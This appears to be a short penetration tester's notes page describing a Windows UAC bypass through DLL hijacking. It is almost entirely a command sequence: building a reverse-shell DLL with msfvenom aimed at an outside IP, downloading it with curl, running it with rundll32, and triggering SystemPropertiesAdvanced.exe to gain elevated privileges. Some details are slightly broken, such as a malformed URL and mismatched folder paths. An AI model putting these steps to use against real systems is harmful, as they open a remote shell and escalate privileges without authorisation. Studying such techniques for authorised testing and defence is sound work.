UAC Bypass
About
More about UAC in theory you can read here [LINK]
Here you would be looking more into UAC Bypasses, because every account. even elevated one have two types of tokens, low and high privilege. And sometimes after we got some high-privilege user we need to bypass UAC to actually use high-privilege token. Here I would write about UAC techniques I used during machines or engagements.
Very useful is UACME repository [LINK]
Also this repo is useful [LINK]
UAC Bypass with DLL Hijacking
Review Path Variable
PS C:/> cmd /c echo %PATH%
Generate Malicious DLL
msfvenom -p windows/shell_reverse_tcp LHOST=13.13.13.13 LPORT=1337 -f dll > srrstr.dll
Download DLL
curl http:/13.13.13.13:1337/srrstr.dll -O "C:\Users\ven17\AppData\Local\Microsoft\Windows Apps\srrstr.dll"
Execute Malicious DLL on Target
rundll32 shell32.dll,Control_RunDLL C:\Users\ven17\AppData\Local\Microsoft\WindowsApps\srrstr.dll
Ensure No Existing rundll32 Instances
tasklist /svc | findstr "rundll32"
taskkill /PID <PID> /F
Execute SystemPropertiesAdvanced.exe for UAC Bypass
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
Verify Elevated Privileges
whoami /priv